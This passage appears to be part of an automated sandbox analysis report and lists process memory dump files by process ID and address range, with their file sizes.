                                                                                                                                                                                                  • memory/2732-263-0x00000000028B0000-0x00000000028B1000-memory.dmp
                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    4KB

                                                                                                                                                                                                  • memory/2732-268-0x0000000000400000-0x00000000007E4000-memory.dmp
                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    3.9MB

                                                                                                                                                                                                  • memory/2996-266-0x0000000004EC4000-0x0000000004EC6000-memory.dmp
                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    8KB

                                                                                                                                                                                                  • memory/3680-218-0x00000000731B0000-0x0000000073960000-memory.dmp
                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    7.7MB

                                                                                                                                                                                                  • memory/3680-236-0x0000000005B20000-0x0000000005B21000-memory.dmp
                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    4KB

                                                                                                                                                                                                  • memory/3680-210-0x0000000000FF0000-0x000000000101E000-memory.dmp
                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    184KB

                                                                                                                                                                                                  • memory/3744-173-0x0000000000400000-0x0000000000419000-memory.dmp
                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    100KB

                                                                                                                                                                                                  • memory/3744-182-0x0000000000400000-0x0000000000419000-memory.dmp
                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    100KB

                                                                                                                                                                                                  • memory/3940-284-0x0000000075B90000-0x0000000075DA5000-memory.dmp
                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    2.1MB

                                                                                                                                                                                                  • memory/3940-297-0x00000000058B0000-0x00000000058B1000-memory.dmp
                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    4KB

                                                                                                                                                                                                  • memory/3940-296-0x0000000005B10000-0x0000000005B11000-memory.dmp
                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    4KB

                                                                                                                                                                                                  • memory/3940-285-0x0000000002ED0000-0x0000000002ED1000-memory.dmp
                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    4KB

                                                                                                                                                                                                  • memory/3940-295-0x0000000075F60000-0x0000000076513000-memory.dmp
                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    5.7MB

                                                                                                                                                                                                  • memory/3940-278-0x0000000000780000-0x0000000000905000-memory.dmp
                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    1.5MB

                                                                                                                                                                                                  • memory/3940-304-0x000000006F6B0000-0x000000006F6FC000-memory.dmp
                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    304KB

                                                                                                                                                                                                  • memory/3940-275-0x0000000001270000-0x0000000001271000-memory.dmp
                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    4KB

                                                                                                                                                                                                  • memory/3940-291-0x0000000071530000-0x00000000715B9000-memory.dmp
                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    548KB

                                                                                                                                                                                                  • memory/3940-289-0x0000000000780000-0x0000000000905000-memory.dmp
                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    1.5MB

                                                                                                                                                                                                  • memory/3940-288-0x00000000731B0000-0x0000000073960000-memory.dmp
                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    7.7MB

                                                                                                                                                                                                  • memory/3940-286-0x0000000000780000-0x0000000000905000-memory.dmp
                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    1.5MB

                                                                                                                                                                                                  • memory/3972-252-0x0000000000B78000-0x0000000000B87000-memory.dmp
                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    60KB

                                                                                                                                                                                                  • memory/3972-201-0x0000000000B78000-0x0000000000B87000-memory.dmp
                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    60KB

                                                                                                                                                                                                  • memory/4376-329-0x0000000000290000-0x00000000002B0000-memory.dmp
                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    128KB

                                                                                                                                                                                                  • memory/4524-219-0x00000000053D0000-0x00000000059E8000-memory.dmp
                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    6.1MB

                                                                                                                                                                                                  • memory/4524-211-0x0000000000400000-0x000000000041E000-memory.dmp
                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    120KB

                                                                                                                                                                                                  • memory/4524-227-0x00000000731B0000-0x0000000073960000-memory.dmp
                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    7.7MB

                                                                                                                                                                                                  • memory/4524-280-0x0000000005200000-0x000000000530A000-memory.dmp
                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    1.0MB

                                                                                                                                                                                                  • memory/4524-229-0x0000000004DA0000-0x0000000004DA1000-memory.dmp
                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    4KB

                                                                                                                                                                                                  • memory/4524-240-0x0000000004F70000-0x0000000004FAC000-memory.dmp
                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    240KB

                                                                                                                                                                                                  • memory/4524-225-0x0000000004F10000-0x0000000004F22000-memory.dmp
                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    72KB

                                                                                                                                                                                                  • memory/4528-308-0x000000000077D000-0x00000000007E9000-memory.dmp
                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    432KB

                                                                                                                                                                                                  • memory/4788-333-0x0000000000350000-0x0000000000370000-memory.dmp
                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    128KB

                                                                                                                                                                                                  • memory/4956-281-0x0000000000260000-0x00000000005EC000-memory.dmp
                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    3.5MB

                                                                                                                                                                                                  • memory/4956-269-0x0000000002D10000-0x0000000002D59000-memory.dmp
                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    292KB

                                                                                                                                                                                                  • memory/4956-282-0x0000000001130000-0x0000000001132000-memory.dmp
                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    8KB

                                                                                                                                                                                                  • memory/5084-292-0x000000000056D000-0x0000000000594000-memory.dmp
                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    156KB

                                                                                                                                                                                                  • memory/5108-260-0x0000000000F30000-0x0000000000F31000-memory.dmp
                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    4KB

                                                                                                                                                                                                  • memory/5108-274-0x00000000731B0000-0x0000000073960000-memory.dmp
                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    7.7MB

                                                                                                                                                                                                  • memory/5108-299-0x0000000002D40000-0x0000000002D41000-memory.dmp
                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    4KB

                                                                                                                                                                                                  • memory/5108-298-0x000000006F6B0000-0x000000006F6FC000-memory.dmp
                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    304KB

                                                                                                                                                                                                  • memory/5108-293-0x0000000005540000-0x0000000005541000-memory.dmp
                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    4KB

                                                                                                                                                                                                  • memory/5108-253-0x0000000000CB0000-0x0000000000CB1000-memory.dmp
                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    4KB

                                                                                                                                                                                                  • memory/5108-287-0x0000000075F60000-0x0000000076513000-memory.dmp
                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    5.7MB

                                                                                                                                                                                                  • memory/5108-256-0x0000000075B90000-0x0000000075DA5000-memory.dmp
                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    2.1MB

                                                                                                                                                                                                  • memory/5108-277-0x0000000071530000-0x00000000715B9000-memory.dmp
                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    548KB

                                                                                                                                                                                                  • memory/5108-273-0x0000000000F60000-0x00000000010E5000-memory.dmp
                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    1.5MB

                                                                                                                                                                                                  • memory/5108-249-0x0000000002990000-0x00000000029D6000-memory.dmp
                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    280KB

                                                                                                                                                                                                  • memory/5108-270-0x0000000000F60000-0x00000000010E5000-memory.dmp
                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    1.5MB

                                                                                                                                                                                                  • memory/5496-395-0x0000000010000000-0x0000000010D56000-memory.dmp
                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    13.3MB

                                                                                                                                                                                                  • memory/5700-356-0x0000000000400000-0x0000000000420000-memory.dmp
                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    128KB